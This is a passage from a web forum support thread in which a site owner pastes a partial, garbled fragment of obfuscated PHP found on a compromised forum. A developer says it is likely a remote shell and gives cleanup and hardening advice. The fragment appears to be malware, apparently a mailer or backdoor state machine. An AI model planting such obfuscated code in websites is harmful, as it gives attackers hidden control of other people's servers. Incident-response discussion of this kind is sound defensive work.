$kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[1].$z26[6].$z26[89].$z26[25].$z26[25].$z26[55]], $kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[52].$z26[45].$z26[55].$z26[96]], 2$qxohi56$qhovh99TRUE); if ($kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[5].$z26[45].$z26[18].$z26[60]] == FALSE) { break; } if ($qxohi56 == || $qxohi56 === 56 || $qxohi56 === 10056 ) { $kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[5].$z26[96].$z26[31].$z26[52]] = $GLOBALS['nmgeu13']($z26[73].$z26[36].$z26[76].$z26[67].$z26[35].$z26[56].$z26[3].$z26[40].$z26[40].$z26[76].$z26[56].$z26[36].$z26[76].$z26[10]); $GLOBALS['ieetj84']($z26$kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[5].$z26[45].$z26[18].$z26[60]], 15); $kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[96].$z26[2].$z26[1].$z26[31]] = $GLOBALS['akdzl43'](); } break; case $GLOBALS['nmgeu13']($z26[73].$z26[36].$z26[76].$z26[67].$z26[35].$z26[56].$z26[3].$z26[40].$z26[40].$z26[76].$z26[56].$z26[36].$z26[76].$z26[10]): if ($GLOBALS['opimn45']($z26$kgjgx72$kkpzl95)) { $kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[25].$z26[89].$z26[96].$z26[89].$z26[2].$z26[9]] = ""$kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[25].$z26[89].$z26[96].$z26[89].$z26[45].$z26[15].$z26[96]] = $z26[76].$z26[19].$z26[44].$z26[3].$z26[29].$kgjgx72[$kkpzl95][$z26[23].$z26[35].$z26[25].$z26[45].$z26[1].$z26[89].$z26[2].$z26[9].$z26[85].$z26[55].$z26[45].$z26[1]].$z26[13].$z26[24]; $kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[5].$z26[96].$z26[31].$z26[52]] = $GLOBALS['nmgeu13']($z26[73].$z26[36].$z26[76].$z26[67].$z26[35].$z26[76].$z26[19].$z26[44].$z26[3]); $kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[96].$z26[2].$z26[1].$z26[31]] = $GLOBALS['akdzl43'](); } break; case $GLOBALS['nmgeu13']($z26[73].$z26[36].$z26[76].$z26[67].$z26[35].$z26[76].$z26[19].$z26[44].$z26[3]): if ($GLOBALS['xrmxg8']($z26$kgjgx72$kkpzl95)) { if ($GLOBALS['opimn45']($z26$kgjgx72$kkpzl95)) { if (substr($kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[25].$z26[89].$z26[96].$z26[89].$z26[2].$z26[9]], 03) != 250) { $GLOBALS['wqgpi24']($z26$kgjgx72$kkpzl95$kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[25].$z26[89].$z26[96].$z26[89].$z26[2].$z26[9]], TRUE); break; } $kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[25].$z26[89].$z26[96].$z26[89].$z26[2].$z26[9]] = ""$kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[25].$z26[89].$z26[96].$z26[89].$z26[45].$z26[15].$z26[96]] = $z26[97].$z26[94].$z26[71].$z26[44].$z26[29].$z26[8].$z26[17].$z26[3].$z26[97].$z26[66].$z26[61].$kgjgx72[$kkpzl95][$z26[23].$z26[35].$z26[1].$z26[89].$z26[2].$z26[34].$z26[85].$z26[55].$z26[45].$z26[1]].$z26[11].$z26[13].$z26[24]; $kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[5].$z26[96].$z26[31].$z26[52]] = $GLOBALS['nmgeu13']($z26[73].$z26[36].$z26[76].$z26[67].$z26[35].$z26[97].$z26[94].$z26[71].$z26[44].$z26[8].$z26[17].$z26[3].$z26[97]); $kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[96].$z26[2].$z26[1].$z26[31]] = $GLOBALS['akdzl43'](); } break; } break; case $GLOBALS['nmgeu13']($z26[73].$z26[36].$z26[76].$z26[67].$z26[35].$z26[97].$z26[94].$z26[71].$z26[44].$z26[8].$z26[17].$z26[3].$z26[97]): if ($GLOBALS['xrmxg8']($z26$kgjgx72$kkpzl95)) { if ($GLOBALS['opimn45']($z26$kgjgx72$kkpzl95)) { if (substr($kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[25].$z26[89].$z26[96].$z26[89].$z26[2].$z26[9]], 03) != 250) { $GLOBALS['wqgpi24']($z26$kgjgx72$kkpzl95$kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[25].$z26[89].$z26[96].$z26[89].$z26[2].$z26[9]], TRUE); break; } $kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[25].$z26[89].$z26[96].$z26[89].$z26[2].$z26[9]] = ""$kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[25].$z26[89].$z26[96].$z26[89].$z26[45].$z26[15].$z26[96]] = $z26[17].$z26[56].$z26[67].$z26[36].$z26[29].$z26[36].$z26[3].$z26[66].$z26[61].$kgjgx72[$kkpzl95][$z26[23].$z26[35].$z26[1].$z26[89].$z26[2].$z26[34].$z26[96].$z26[45]].$z26[11].$z26[13].$z26[24]; $kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[5].$z26[96].$z26[31].$z26[52]] = $GLOBALS['nmgeu13']($z26[73].$z26[36].$z26[76].$z26[67].$z26[35].$z26[17].$z26[56].$z26[67].$z26[36].$z26[36].$z26[3]); $kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[96].$z26[2].$z26[1].$z26[31]] = $GLOBALS['akdzl43'](); } break; } break; case $GLOBALS['nmgeu13']($z26[73].$z26[36].$z26[76].$z26[67].$z26[35].$z26[17].$z26[56].$z26[67].$z26[36].$z26[36].$z26[3]): if ($GLOBALS['xrmxg8']($z26$kgjgx72$kkpzl95)) { if ($GLOBALS['opimn45']($z26$kgjgx72$kkpzl95)) { if (substr($kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[25].$z26[89].$z26[96].$z26[89].$z26[2].$z26[9]], 03) != 250 && substr($kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[25].$z26[89].$z26[96].$z26[89].$z26[2].$z26[9]], 03) != 251) { $GLOBALS['wqgpi24']($z26$kgjgx72$kkpzl95$kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[25].$z26[89].$z26[96].$z26[89].$z26[2].$z26[9]], TRUE); break; } $kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[25].$z26[89].$z26[96].$z26[89].$z26[2].$z26[9]] = "";  
     
  4. Brit Mansell

    Brit Mansell Member

    There was quite a bit more too it than that, but it was too long to paste in. Just more of the same.
     
  5. Mike

    Mike XenForo Developer Staff Member

    That's pretty certainly #3 in Jake's list -- that's clearly obfuscated and presumably something like a remote shell. The first thing to do would be to remove access to any files like that, however that requires finding every single hole as leaving one still leaves you vulnerable. If possible, it may be worth disabling PHP from executing within the data (and internal_data) directories (when accessed through the web server).

    You will need to attempt to figure how they got in. You might find the last modified times on these files to give you a hint of when they were first placed to see if that gives you any useful information.

    The big other thing to look at is the other software on the server, particularly ones that would be able to write to that area. It's very likely one of those is the source. I do note that you have WordPress at the root of your domain, so I think that'd be the first place to check -- make sure everything (including all plugins) are running the latest version.

    Strictly speaking, in a situation like this, you would ideally want to "nuke it" and start from a set of files and data prior to the compromise, but that's unlikely to be viable.
     
  6. Brit Mansell

    Brit Mansell Member

    Mike, you are right about nuking it, but unfortunately, this wasn't discovered until we had already eclipsed our backup schedule. I was hoping to deal with it somehow other than a reinstall.

    I'll post back with what we decide to do.

    Thanks for your response.
     

Share This Page